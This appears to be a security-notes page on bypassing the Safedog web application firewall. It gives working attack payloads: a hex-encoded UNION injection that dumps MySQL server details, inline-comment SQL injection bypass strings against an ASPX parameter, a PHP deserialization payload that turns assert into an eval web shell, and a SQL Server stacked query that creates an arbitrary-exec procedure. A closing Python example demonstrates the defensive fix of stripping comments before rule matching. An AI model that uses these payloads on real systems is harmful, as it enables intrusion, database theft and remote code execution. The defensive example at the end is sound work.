Application Security - Security Devices - WAF Series - Software WAF - Safedog
2020-7 - Union query payload that bypasses Safedog
group_concat(0x3C68343E42797061737320736563757269747920646F672073716C5F696E6A6563743C68343E,0x3C68723E,0x4D7953514C20506F72743A20202020,@@port,0x3C68723E,0x4D7953514C2076657273696F6E3A,@@version,0x3C68723E,0x4D7953514C5F696E7374616C6C5F706174683A2020,@@basedir,0x3C68723E,0x4D7953514C5F64617461626173655F706174683A20202020,@@datadir,0x3C68723E,0x43757272656E7420646174616261736520757365723A20202020,current_user,0x3C68723E,0x73797374656D2076657273696F6E3A20202020,@@version_compile_os,0x3C68723E,0x686F73746E616D653A20202020,@@hostname,0x3C68723E,0x43757272656E742064617461626173653A20202020,database/*!()*/,0x3C68723E,0x5573657220496E666F3A20202020,user/*!()*/)
Installation - Linux
Download: http://download.safedog.cn/safedog_linux64.tar.gz
wget http://download.safedog.cn/safedog_linux64.tar.gz
Extract (the downloaded archive is gzip-compressed):
tar xvf safedog_linux64.tar.gz
Run the installer:
./install.py
Uninstall: change into the extracted package directory, then
chmod +x uninstall.sh
./uninstall.sh
Installation - Windows
Download: http://down.safedog.cn/download/software/safedogfwqV5.0.exe
User Guides
https://www.safedog.cn/download/software/safedogfwq_Windows_Help.pdf
https://www.safedog.cn/download/software/safedogfwq_linux_Help.pdf
Bypasses
Rule-defect bypass - search box + string-type SQL injection + IIS + ASPX + /**a*/
aspx?Pro=广x' and 1=1 --          # detected (blocked by the rule)
aspx?Pro=广x' /**a*/and 1=1 --    # bypass (the inline comment breaks the rule's pattern)
# enumeration
aspx?Pro=广x' /**a*/union /**a*/select 1,2,3,4,5 --
aspx?Pro=广x' /**a*/and 1=(select 1) --
PHP deserialization bypass
<?php
class A {
    public $name;
    public $male;
    function __destruct() {
        // $name is used as a callable and $male as its argument
        $a = $this->name;
        $a($this->male);
    }
}
unserialize($_POST['un']);
?>
POST - un=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:16:"eval($_GET["x"])";}
GET - x=phpinfo(); -- used together with Hackbar
Stored procedure + SQL Server bypass
?type=1;EXEC/*(*/student..sp_sqlexec 'CREATE PROCEDURE myexec(@s VARCHAR(1024)) as exec(@s)'
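Both the ASPX /**a*/ bypass and the EXEC/*(*/ bypass above work because the rule matches the raw request text while the database discards the comment. The following added example (not from the page or from Safedog) shows the WAF-side fix: normalize comments away before matching. The rule regex and the sample requests are constructed for the demonstration; MySQL's /*! ... */ conditional comments are kept because the server executes their body.

```python
import re

# Constructed samples modelled on the page's payloads (not captured traffic).
BLOCKED = "aspx?Pro=x' and 1=1 --"
BYPASS = "aspx?Pro=x' /**a*/and 1=1 --"
UNION = "aspx?Pro=x' /**a*/union /**a*/select 1,2,3,4,5 --"
MSSQL = "?type=1;EXEC/*(*/student..sp_sqlexec 'CREATE PROCEDURE myexec(@s VARCHAR(1024)) as exec(@s)'"

# A naive rule of the kind the page's bypass defeats: it expects the quote,
# whitespace and keyword to be adjacent in the raw request string.
NAIVE_RULE = re.compile(r"'\s+(and|or|union)\b", re.IGNORECASE)
# A keyword rule for the T-SQL case that likewise assumes EXEC is followed by whitespace.
EXEC_RULE = re.compile(r"\bexec\s+\w", re.IGNORECASE)

# MySQL executes the body of /*!...*/ comments, so the body must survive;
# every other /* ... */ comment is dead text that the database ignores.
_COND_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.DOTALL)
_PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def normalize_sql(s: str) -> str:
    """Reduce a request to roughly what the SQL parser will see."""
    s = _COND_COMMENT.sub(lambda m: m.group(1), s)  # keep executed body
    s = _PLAIN_COMMENT.sub(" ", s)                  # drop dead comments
    return re.sub(r"\s+", " ", s).strip()


def matches_raw(rule: re.Pattern, s: str) -> bool:
    """Rule applied to the raw request: what the defective WAF rule does."""
    return rule.search(s) is not None


def matches_normalized(rule: re.Pattern, s: str) -> bool:
    """Rule applied after normalization: what the WAF should do."""
    return rule.search(normalize_sql(s)) is not None


if __name__ == "__main__":
    for req in (BLOCKED, BYPASS, UNION):
        print(matches_raw(NAIVE_RULE, req), matches_normalized(NAIVE_RULE, req), req)
    print(matches_raw(EXEC_RULE, MSSQL), matches_normalized(EXEC_RULE, MSSQL), MSSQL)
```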